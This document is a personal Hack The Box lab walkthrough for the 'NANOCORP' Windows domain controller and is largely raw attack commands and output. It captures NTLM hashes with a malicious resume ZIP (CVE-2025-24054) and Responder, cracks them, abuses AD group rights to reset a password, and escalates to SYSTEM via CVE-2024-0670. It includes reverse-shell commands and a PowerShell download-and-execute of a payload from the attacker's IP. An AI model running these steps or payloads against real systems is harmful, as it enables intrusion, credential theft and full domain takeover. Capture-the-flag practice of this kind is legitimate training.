Here is my note on NANOCORP box from Hackthebox.
NANOCORP: 10.10.11.93
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
nxc ldap 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --dns-tcp --dns-server 10.10.11.93 --bloodhound --collection All
BLOODHOUND DATA:
WEB_SVC@NANOCORP.HTB -> AddSelf -> IT_SUPPORT@NANOCORP.HTB GROUP -> ForceChangePassword -> MONITORING_SVC@NANOCORP.HTB -> CanPSRemote -> DC01.NANOCORP.HTB:
bloodyAD --host "10.10.11.93" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' add groupMember "IT_SUPPORT" "web_svc"
net rpc group members "IT_SUPPORT" -U "nanocorp.htb"/"web_svc"%'dksehdgh712!@#' -S "nanocorp.htb"
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# bloodyAD --host "10.10.11.93" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' add groupMember "IT_SUPPORT" "web_svc"
[+] web_svc added to IT_SUPPORT
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# net rpc group members "IT_SUPPORT" -U "nanocorp.htb"/"web_svc"%'dksehdgh712!@#' -S "nanocorp.htb"
NANOCORP\web_svc
bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' set password MONITORING_SVC 'Password123@'
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' set password MONITORING_SVC 'Password123@'
[+] Password changed successfully!
faketime -f $(ntpdate -q dc01.nanocorp.htb | awk '{print $4}') bash
getTGT.py nanocorp.htb/monitoring_svc:'Password123@' -dc-ip 10.10.11.93
export KRB5CCNAME=monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# cat /etc/krb5.conf
[libdefaults]
default_realm = NANOCORP.HTB
dns_lookup_kdc = false
dns_lookup_realm = false
[realms]
NANOCORP.HTB = {
kdc = dc01.nanocorp.htb
admin_server = dc01.nanocorp.htb
default_domain = nanocorp.htb
}
[domain_realm]
.nanocorp.htb = NANOCORP.HTB
nanocorp.htb = NANOCORP.HTB
evil-winrm -i dc01.nanocorp.htb -r nanocorp.htb
python3 winrmexec.py -ssl -port 5986 -k nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -no-pass
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# getTGT.py nanocorp.htb/monitoring_svc:'Password123@' -dc-ip 10.10.11.93
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# export KRB5CCNAME=monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# python3 winrmexec.py -ssl -port 5986 -k nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
PS C:\Users\monitoring_svc\Documents> whoami
nanocorp\monitoring_svc
PS C:\Users\monitoring_svc\Documents> hostname
DC01
USER-SHELL !
https://github.com/ozelis/winrmexec
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://nanocorp.htb/ -H "Host: FUZZ.nanocorp.htb"
[SNIP]
hire [Status: 200, Size: 2520, Words: 646, Lines: 68, Duration: 140ms]
Source code of the main page: http://nanocorp.htb/
[SNIP]
</div>
<div class="row tm-reverse-sm">
<div class="col-sm-12 col-md-8 col-lg-8 col-xl-8">
<p class="mb-4">At Nano Corp, we are committed to excellence. Our team of experts works tirelessly to build cutting-edge solutions. And now, we’re growing.<strong>we are hiring!</strong> Join us in shaping the future of cybersecurity and tech innovation.</p>
<a href="http://hire.nanocorp.htb" class="btn tm-btn-gray">Apply Now</a>
</div>
<div class="col-sm-12 col-md-4 col-lg-4 col-xl-4 mb-lg-0 mb-sm-4 mb-4">
<img src="img/team.jpg" class="img-fluid">
</div>
</div>
hire.nanocorp.htb = interesting ?
hire.nanocorp.htb:
Upload Your Resume (Zip File Only):
Generate a malicious pdf file then zip it to steal the credentials with responder tool.
python3 ntlm_theft.py --generate all --server 10.10.14.148 --filename resume
Close enough but it's vulnerable to CVE-2025-24054 !
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
https://www.exploit-db.com/exploits/52280
https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC
https://github.com/reloc2/CVE-2025-24054
https://medium.com/@chintalatarakaram/%EF%B8%8F-cve-2025-24054-actively-exploited-vulnerability-stealing-ntlm-credentials-what-you-need-to-631ac46f45e3
┌──(root㉿kali)-[/home/kali/Kali-Tools/CVE-2025-24054]
└─# python3 poc.py
Enter your file name: resume
Enter IP (EX: 192.168.1.162): 10.10.14.148
completed
┌──(root㉿kali)-[/home/kali/Kali-Tools/CVE-2025-24054]
└─# ls
exploit.zip poc.py README.md
┌──(root㉿kali)-[/home/kali/Kali-Tools/CVE-2025-24054]
└─# mv exploit.zip resume.zip
Upload resume.zip in hire.nanocorp.htb and capture the hash with Responder.
sudo responder -I tun0
[SNIP]
[SMB] NTLMv2-SSP Client : 10.10.11.93
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:b53088f56241089d:0D6B979ABAC95CD3CBAA095D78AD4F07:010100000000000080ACE1891858DC013DEB2ABFBB9B83340000000002000800500055005300490001001E00570049004E002D004A003600380044004200350046004B0052005400390004003400570049004E002D004A003600380044004200350046004B005200540039002E0050005500530049002E004C004F00430041004C000300140050005500530049002E004C004F00430041004C000500140050005500530049002E004C004F00430041004C000700080080ACE1891858DC0106000400020000000800300030000000000000000000000000200000D3C8C6BA64638A0ECF4ACD2BFAA2DEF3B115DBF17FDA1D541FEE6B2C0C155BF50A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340038000000000000000000
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
web_svc::NANOCORP:b53088f56241089d:0D6B979ABAC95CD3CBAA095D78AD4F07:010100000000000080ACE1891858DC013DEB2ABFBB9B83340000000002000800500055005300490001001E00570049004E002D004A003600380044004200350046004B0052005400390004003400570049004E002D004A003600380044004200350046004B005200540039002E0050005500530049002E004C004F00430041004C000300140050005500530049002E004C004F00430041004C000500140050005500530049002E004C004F00430041004C000700080080ACE1891858DC0106000400020000000800300030000000000000000000000000200000D3C8C6BA64638A0ECF4ACD2BFAA2DEF3B115DBF17FDA1D541FEE6B2C0C155BF50A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340038000000000000000000
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dksehdgh712!@# (web_svc)
1g 0:00:00:02 DONE (2025-11-17 23:37) 0.4149g/s 769912p/s 769912c/s 769912C/s dobson5499..djcward
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
web_svc:dksehdgh712!@#
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-18 00:30:40Z)
sudo GetNPUsers.py -no-pass -dc-ip 10.10.11.93 -usersfile users.txt nanocorp.htb/
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# sudo GetNPUsers.py -no-pass -dc-ip 10.10.11.93 -usersfile users.txt nanocorp.htb/
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User web_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
#NOPE
nxc ldap 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --kerberoasting output.txt
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# nxc ldap 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --kerberoasting output.txt
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.93 389 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
LDAP 10.10.11.93 389 DC01 Bypassing disabled account krbtgt
LDAP 10.10.11.93 389 DC01 No entries found!
LDAP 10.10.11.93 389 DC01 [-] Error with the LDAP account used
#NOPE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/NANOCORP/10.10.11.93/BLOOD]
└─# nxc smb 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --shares
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB 10.10.11.93 445 DC01 [*] Enumerated shares
SMB 10.10.11.93 445 DC01 Share Permissions Remark
SMB 10.10.11.93 445 DC01 ----- ----------- ------
SMB 10.10.11.93 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.93 445 DC01 C$ Default share
SMB 10.10.11.93 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.93 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.93 445 DC01 SYSVOL READ Logon server share
sudo lookupsid.py web_svc@10.10.11.93 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after: 2026-04-06T23:18:43
python3 winrmexec.py -ssl -port 5986 -k nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -no-pass
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# getTGT.py nanocorp.htb/monitoring_svc:'Password123@' -dc-ip 10.10.11.93
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# export KRB5CCNAME=monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# python3 winrmexec.py -ssl -port 5986 -k nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
PS C:\Users\monitoring_svc\Documents> whoami
nanocorp\monitoring_svc
PS C:\Users\monitoring_svc\Documents> hostname
DC01
USER-SHELL !
https://github.com/ozelis/winrmexec
PS C:\Users\monitoring_svc\Desktop> whoami
nanocorp\monitoring_svc
PS C:\Users\monitoring_svc\Desktop> hostname
DC01
PS C:\Users\monitoring_svc\Desktop> dir
Directory: C:\Users\monitoring_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/18/2025 4:46 PM 34 user.txt
PS C:\Users\monitoring_svc\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
donut -f 1 -o shell.bin -a 2 -i shell.exe
base64 -w 0 shell.bin | xclip -sel clip
var shellcode = Convert.FromBase64String("<base64 content here>");
ShellCode.ShellCodeExecute(shellcode);
dotnet bin/Debug/netcoreapp3.1/SharpGen.dll -f payload.exe -s contents.txt -C shell -d net40
[SNIP]
[*] Compiled assembly written to: /home/kali/BOXES/NANOCORP/SharpGen/Output/payload.exe
$bytes = (new-object net.webclient).downloaddata("http://10.10.14.148/payload.exe")
[System.Reflection.Assembly]::Load($bytes)
$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static"
$main = [Shell].getmethod("Main", $BindingFlags)
$main.Invoke($null, $null)
#NOPE
But netcat works as usual.
RunasCs.exe web_svc 'dksehdgh712!@#' powershell.exe -r 10.10.14.148:4444
RunasCs.exe web_svc dksehdgh712!@# powershell.exe -r 10.10.14.148:4444 #WORKS !
CVE-2024-0670 CHECKMK PRIV ESC NOTES: #NANOCORP-HTB
PS C:\Program Files (x86)> whoami
whoami
nanocorp\web_svc
PS C:\Program Files (x86)> hostname
hostname
DC01
PS C:\Program Files (x86)> dir
dir
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/5/2025 4:17 PM checkmk #Interesting
d----- 5/8/2021 1:34 AM Common Files
d----- 11/3/2025 4:13 PM Internet Explorer
d----- 5/8/2021 2:40 AM Microsoft
It's vulnerable to CVE-2024-0670 !
https://github.com/elsevar11/CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit
exploit.ps1:
[SNIP]
param(
[int]$MinPID = 1000,
[int]$MaxPID = 10000,
[string]$LHOST = "10.10.14.148",
[string]$LPORT = "4444"
)
[SNIP]
.\RunasCs.exe web_svc dksehdgh712!@# "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
[*] Scanning for Check MK-related MSI files (SYSTEM-owned)...
[*] Successfully found Check MK MSI!
[*] Software Name: Check MK Agent 2.1
[*] MSI Path: C:\Windows\Installer\1e6f2.msi
[*] Seeding 1000 to 10000...
[*] Seeding complete.
[*] Triggering MSI repair for Check MK...
[*] Sucessful!
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit]
└─# sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.148] from (UNKNOWN) [10.10.11.93] 53913
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
DC01
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2EB6-7759
Directory of C:\Users\Administrator\Desktop
04/09/2025 05:13 PM <DIR> .
04/12/2025 12:45 PM <DIR> ..
11/18/2025 04:46 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4,828,299,264 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
54028/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54033/tcp open msrpc Microsoft Windows RPC
54055/tcp open msrpc Microsoft Windows RPC
56340/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
----------------------Starting UDP Scan------------------------
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time:
| date: 2025-11-18T00:30:58
|_ start_date: N/A